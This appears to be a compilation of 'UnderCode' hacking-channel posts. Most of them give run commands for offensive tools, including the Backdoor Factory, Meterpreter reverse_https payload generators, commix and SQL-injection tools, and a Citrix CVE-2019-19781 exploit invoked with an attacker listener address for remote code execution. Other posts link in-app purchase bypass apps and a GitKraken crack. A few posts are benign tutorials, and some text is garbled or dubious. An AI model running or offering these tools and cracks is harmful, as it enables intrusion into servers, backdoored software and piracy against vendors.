▁ ▂ ▄𝖀𝕹𝕯𝕰𝕽𝕮𝕺𝕯𝕰 𝕹𝕰𝖂𝕾 ▄ ▂ ▁


1) WE GOT NOW A FACEBOOK GROUPE ForPosts Only Related To UndercOde & some difference in posts with wa/teleg

> fb.com/groups/UndercOdeTesting


2) Our link To Official Telegram Is Changed WIth The discuss One
> Official Telegram :
t.me/UndercOdeTesting
> Discuss :
t.me/UndercOdeTestingOfficial
(Our Telegram For iOs Still same t.me/iOsdeveloppers
Admin still same t.me/UndercOdeOfficial )


▁ ▂ ▄𝖀𝕹𝕯𝕰𝕽𝕮𝕺𝕯𝕰 𝕹𝕰𝖂𝕾 ▄ ▂ ▁

🦑 Under Code Facebook Groupe :

Fb.com/groups/UndercOdeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2019 updated termux tool installer most helpfull termux tool :
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/Gameye98/Lazymux

2) cd Lazymux

3) python2 lazymux.py

🦑FEATURES :

> Information Gathering

> Vulnerability Scanner

> Stress Testing

> Password Attacks

> Web Hacking

>Exploitation Tools

> sniffing & Spoofing

> other...


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑An advanced multithreaded admin panel finder
Twitter.com/UndercOdeTC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/s0md3v/Breacher

2) cd Breacher

3) Check all paths with php extension

> python breacher -u example.com --type php

4) Check all paths with php extension with threads

> python breacher -u example.com --type php --fast

5) Check all paths without threads

> python breacher -u example.com

6) Adding a custom path. For example if you want all paths to start with /data (example.com/data/...) you can do this:

> python breacher -u example.com --path /data

🦑FEATURES:

1) Multi-threading on demand

2) Big path list (482 paths)

3) Supports php, asp and html extensions

4) Checks for potential EAR vulnerabilites

5) Checks for robots.txt

6) Support for custom patns


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Create an Admin Panel with a Bootstrap Template?
T.me/UndercOdeTesting

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) Getting an Admin Template You Love

>StarAdmin free bootstrap admin template as an example. The template has a nice and clean design and the quality of the code is great. I find it just right to create a simple admin panel. And it is free. Also, the template is updated to the latest version of Bootstrap, Bootstrap 4 beta.

2) The Design of the Admin Panel

THEN The top navbar of the dashboard has the navbar brand "Star" on the left end

> Next, in the navbar, there is a hamburger icon on the left 😅.On the right end, there is a button with refresh icon, a bell icon with the number of notifications indicated and an envelope icon with an indication of the number of messages. At the end, there is a profile picture of the user.

> In the left sidebar, there is only one menu item, the dashboard, for now.
In the content area, In the first card, we have a bar graph and a donut chart. The bar graph displays the types of traffic that flow into the website and the donut chart displays the device sources of the traffic.

3) Let's Get Coding

> Installation
Before starting coding make sure to install Git, Node.js, and npm. Gulp is used as the build tool. Installing Gulp requires that you have Node installed on your computer.
This creates the foundation for the development of the dashboard.

>Download the Template
Open the command prompt and change the directory path to the project folder and download the template. enter the command git clone https://github.com/BootstrapDash/StarAdmin-Free-Bootstrap-Admin-Template.git.  This will download the template to your folder. Or you can download the template files as a zip folder.

4) go to the command prompt, and enter the command gulp serve at the command prompt. This will open up the index.html file of the template in the default browser.

5)edit the existing index.html page and edit the page. To do this, open the page in a code editor.

6)There is a refresh icon, a bell icon, and an envelope icon. When you hit 'save' is gulp task is running, the browser will refresh and the changes will be automatically displayed on the browser


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Usefull code for html edit with code editor for Admin Panel :
Fb.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

<!--Navbar-->
<nav class="navbar bg-primary-gradient col-lg-12 col-12 p-0 fixed-top navbar-inverse d-flex flex-row">
<!-- Navbar brand -->
<div class="bg-white text-center navbar-brand-wrapper">
<a class="navbar-brand brand-logo" href="#"><img src="../images/logo_star_black.png" /></a>
<a class="navbar-brand brand-logo-mini" href="#"><img src="../images/logo_star_mini.jpg" alt=""></a>
</div>
<!-- Navbar brand ends -->
<div class="navbar-menu-wrapper d-flex align-items-center">
<button class="navbar-toggler navbar-toggler hidden-md-down align-self-center mr-3" type="button" data-toggle="minimize">
<span class="navbar-toggler-icon"></span>
</button>
<-- navbar icons -->
<ul class="navbar-nav ml-lg-auto d-flex align-items-center flex-row">
<li class="nav-item">
<a class="nav-link" href="#"><i class="fa fa-refresh"></i></a>
</li>
<li class="nav-item">
<a class="nav-link" href="#"><i class="fa fa-bell-o "></i></a>
</li>
<li class="nav-item">
<a class="nav-link" href="#"><i class="fa fa-envelope-o"></i></a>
</li>
<li class="nav-item">
<a class="nav-link profile-pic" href="#"><img class="rounded-circle" src="../images/face.jpg" alt=""></a>
</li>
</ul>
<-- navbar icons end -->
<button class="navbar-toggler navbar-toggler-right hidden-lg-up align-self-center" type="button" data-toggle="offcanvas">
<span class="navbar-toggler-icon"></span>
</button>
</div>
</nav>
<!--End navbar-->

Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑Best android apps 2019-2020 to bypass purchase :
T.me/UndercOdeTesting

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) LUCKY PATCHER
Lucky Patcher is the most commonly used application for bypassing the in-app purchase restrictions in Android apps.

> https://www.luckypatchers.com/download/

2) FREEDOM APK
Freedom APK is an Android app which will help you unlock the premium features of popular games free of cost.

> https://freedomapkdld.com/

3) LEO PLAYCARD
Another app you can use to hack in-app purchase on Android is Leo Playcard. The app hacks Android games in a manner similar to Lucky Patcher above.


> http://leoplaycard.info/

4) XMODGAMES
Xmodgames is another app that allows you to access in-app purchases in games for free. This app unlocks purchases in games like ‘Clash of Clans’, ‘8 ball pool’, ‘Clash Royale 💀

> https://xmodgames.download/

5) CREE HACK
Cree Hack is another good application to get the free in-app purchase on Android for any game and update to the maximum level.

> https://creehacks.com/

Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑WANNA TO HACK CARS LIKE FATE&FURIOUS, Remontly, unlocking ...
T.me/UndercOdeTesting

1) OpenGarages - Provides public access, documentation and tools necessary to understand today's modern vehicle systems.
> http://opengarages.org/index.php/Main_Page

2) DEFCON Car Hacking Village - Car Hacking exercises from DEFCON 24.
> http://www.carhackingvillage.com/

3) canbushack: Hack Your Car - course on Vehicle Hacking methodology.
> http://www.canbushack.com/blog/index.php

4) OWASP Internet of Things Project - OWASP's project to secure IoT, from cars to medical devices and beyond.
> https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=Community

5) I Am The Cavalry - Global grassroots (eg. volunteer) initiative focused on the intersection of security and human life/public safety issues, such as cars. Participation from security researchers, OEMs, Tier 1s, and many others. Published Automotive 5-Star Cyber Safety Framework.
> https://www.iamthecavalry.org/

6) Carloop Community - Community of people interested in car hacking and connecting vehicles to the cloud.
> https://community.carloop.io/


7) Python Security - A website for brows in and buying python-integrated cars having certain vehicular security features.
> http://www.pythoncarsecurity.com/


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

2020 updated web server scanner
Fb.com/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/sullo/nikto.git

2) cd nikto

3) docker build -t sullo/nikto .
# Call it without arguments to display the full help

4) docker run --rm sullo/nikto
# Basic usage

5)docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:

6) docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json

🦑Tested by UndercOde On:

> kali

> ubanto


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Social engeneer tool : the backdoor factory For security professionals and researchers only.
The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) sudo pip install capstone

2) git clone https://github.com/secretsquirrel/the-backdoor-factory

3) cd the-backdoor-factory

4) docker pull secretsquirrel/the-backdoor-factory

5) docker run -it secretsquirrel/the-backdoor-factory bash

6) ./backdoor.py

🦑For Macos run as bash :

chmod 777 install.sh

./install.sh


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is the difference between IPv4 and IPv6?
One of the main differences between IPv4 and IPv6 is their address space:
twitter.com/UNdercodetc

1) IPv4 addresses are 32 bits in size.

> Whereas the IPv6 address fields are 128 bits.

2) Due to their difference in address space, the appearance of IP addresses in IPv4 and IPv6 also looks different.

> In IPv4, IP addresses are displayed as four decimal numbers in 1 byte, separated by periods (for example: 192.168.1.1), and in IPv6 IP addresses, hexadecimal numbers are displayed, separated by colons (for example: fe80 :: d4a8: 6435: d2d8: d9f3b11) .

3) Clients using IPv4 addresses use a DHCP server to determine the address each time they enter the network.

>This process of assigning addresses is called automatic network state tuning.

4) IPv6 supports the revised DHCPv6 protocol, which supports automatic state configuration and supports automatic stateless configuration of hosts.

5) Automatic configuration without saving does not require the DHCP server to receive addresses.

6) Automatic configuration without saving uses a router request to create a unique address.
> This creates a plug-and-play environment that simplifies address management and administration.

7) IPv6 also allows automatic configuration and reconfiguration of addresses.

8) This feature allows administrators to renumber network addresses without access to all clients.

This is the main difference between IPv4 and IPv6.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top Exploite tool Meterpreter Paranoid Mode - SSL/TLS connections for linux :
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Download framework from github

> git clone https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git

2) Set files execution permitions

> cd Meterpreter_Paranoid_Mode-SSL

3) sudo chmod +x *.sh

4) Config tool settings

> nano settings

5) Run main tool

>sudo ./Meterpreter_Paranoid_Mode.sh

🦑Payloads available:

Staged (payload.bat|ps1|txt|exe):
windows/meterpreter/reverse_winhttps
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https

Stageless (binary.exe):
windows/meterpreter_reverse_https
windows/x64/meterpreter_reverse_https

Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller and Citrix Gateway detailed
fb.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.

> The vulnerability has been assigned the following CVE number:

> CVE-2019-19781 : Vulnerability in Citrix Application Delivery Controller and Citrix Gateway leading to arbitrary code execution

> The vulnerability affects all supported product versions and all supported platforms:

1) Citrix ADC and Citrix Gateway version 13.0 all supported builds

2) Citrix ADC and NetScaler Gateway version 12.1 all supported builds

3) Citrix ADC and NetScaler Gateway version 12.0 all supported builds

4) Citrix ADC and NetScaler Gateway version 11.1 all supported builds

5) Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑cve-2019-19781 Bug
>This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

This tool used for exploite servers

1) git clone https://github.com/trustedsec/cve-2019-19781

2) cd cve-2019-19781

3) pip3 install -r requirements.txt

4) python citrixmash.py <attackerip_listener> <attacker_port>

🦑How it works ?

> This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution.

> Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/

>Note that DNS hostnames and IP addresses are supported in victimaddress and attackerip_listener fields.

Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automated All-in-One OS command injection and exploitation tool
2020 updated :
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/commixproject/commix.git commix

2) cd commix

3) python commix.py -h

🦑What is The Use ?

>Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool ,

>that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.

> By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HexInject is a very versatile packet injector and sniffer, that provide a command-line framework for raw network access.
>HexInject is a very versatile packet injector and sniffer,
that provide a command-line framework for raw network access.
fb.com/UndercOdeTestingCompany
It's designed to work together with others command-line utilities,
and for this reason it facilitates the creation of powerful shell scripts
capable of reading, intercepting and modifying network traffic in a transparent manner

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/ParrotSec/hexinject

2) cd hexinject

3) Type make to compile (install)

🦑Features :

1) hexinject:
The main sniffer and injector.

2) prettypacket:
Disassemble raw packets (received on its standard input) and print their field.
Can also print example packets (useful if you want to know the structure of an header).

3) hex2raw:
Convert hexstring (the textual format used by hexinject) to raw data,
and vice-versa.

4) packets.tcl:
Experimental packet forger, written in TCL.
It uses a simple packet representation format based on APD

🦑Tested On:

>Parrot

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top 2019-2020 injection tools agaible on gitlab & github
twitter.com/UndercOdeTc

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) SQLMap - Automatic SQL Injection And Database Takeover Tool

2) jSQL Injection - Java Tool For Automatic SQL Database Injection

3) BBQSQL - A Blind SQL Injection Exploitation Tool

4) NoSQLMap - Automated NoSQL Database Pwnage

5) Whitewidow - SQL Vulnerability Scanner

6) DSSS - Damn Small SQLi Scanner

7) explo - Human And Machine Readable Web Vulnerability Testing Format

8) Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting

9) Leviathan - Wide Range Mass Audit Toolkit

10) Blisqy - Exploit Time-based blind-SQL injection in HTTP-Headers (MySQL/MariaDB)

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Crack GitKraken 2019 tool
T.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/5cr1pt/GitCracken

2) cd GitCracken

3) then run :


> yarn install

4) yarn build

5) node dist/bin/gitcracken.js --help for more usage information

6)gitcracken patcher [options] [actions...]

🦑Examples :

> Auto patch installed GitKraken (maybe require sudo privileges on GNU/Linux)

1) gitcracken patcher
Use custom path to app.asar

2)?gitcracken patcher --asar ~/Downloads/gitkraken/resources/app.asar
Use custom actions (backup, unpack and patch)

3) gitcracken patcher backup unpack patch

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How install & Run any Yarn File :
T.me/UndercOdeTesting

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) open terminal & type

> curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add

4) Add the Yarn APT repository to your system's software repository list by typing:

> echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list

5) Once the repository is added to the system, update the package list, and install Yarn, with:

> sudo apt update

> sudo apt install yarn

6) If you already don't have Node.js installed on your system, the command above will install it.

7)!Those who are using nvm can skip the Node.js installation with:

> sudo apt install --no-install-recommends yarn

8) To verify that Yarn installed successfully, run the following commands which will print the Yarn version number:
yarn --version

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁